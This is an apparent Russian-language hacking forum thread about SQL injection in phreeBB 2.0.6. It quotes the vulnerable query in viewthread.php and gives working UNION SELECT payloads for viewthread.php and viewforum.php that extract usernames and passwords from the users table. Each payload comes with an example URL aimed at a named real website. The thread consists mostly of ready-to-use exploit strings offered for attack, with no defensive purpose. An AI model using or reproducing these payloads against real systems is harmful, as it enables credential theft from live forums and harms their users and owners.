Не путать с phpBB! SQL-Inj Продукт: phreeBB Версия: 2.0.6 Уязвимый скрипт: viewthread.php PHP: $result = mysql_query("SELECT * FROM viewForums WHERE view=$id"); $msgData = mysql_fetch_array($result); Эксплойт: Code: -1/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9,10/**/from/**/users--+ Пример: Code: http://www.vespaclubbiella.it/forum/viewthread.php?forumid=2&id=-42/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9,10/**/from/**/users--+
А че дальше то недобил Дедуль))))) чет случайно наткнулся)))У меня сорцов нету , не смог ни где скачать)(((((( Файл : viewforum.php exploit : Code: -1+union+select+1,concat_ws(0x3a,userName,userPass),3,4,5,6,7,8+from+users-- Пример: Code: http://ilcuckold.altervista.org/forum/viewforum.php?id=-1+union+select+1,concat_ws(0x3a,userName,userPass),3,4,5,6,7,8+from+users--